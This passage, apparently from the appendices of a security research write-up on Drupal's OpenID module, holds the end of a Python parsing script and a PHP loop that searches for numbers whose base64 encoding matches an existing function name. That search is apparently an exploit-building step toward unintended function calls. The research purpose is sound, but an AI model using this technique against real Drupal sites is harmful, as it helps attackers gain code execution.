 i += 1
 while i < len(d) and d[i] in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_":
   i += 1  

f = open(sys.argv[1], "w")
f.write(o)
f.close()

Appendix B: Number-to-function brute force

Either run this from Drupal, or copy-paste openid_dh_long_to_base64, its dependencies and the function below to a new file.
for($i = 0; $i < 123123123; $i += 86) {
 $user_enc = _openid_dh_long_to_base64($i);
 if(function_exists($user_enc)) {
   $j = $i / 86;
   echo "$j $user_enc\n";
 }
}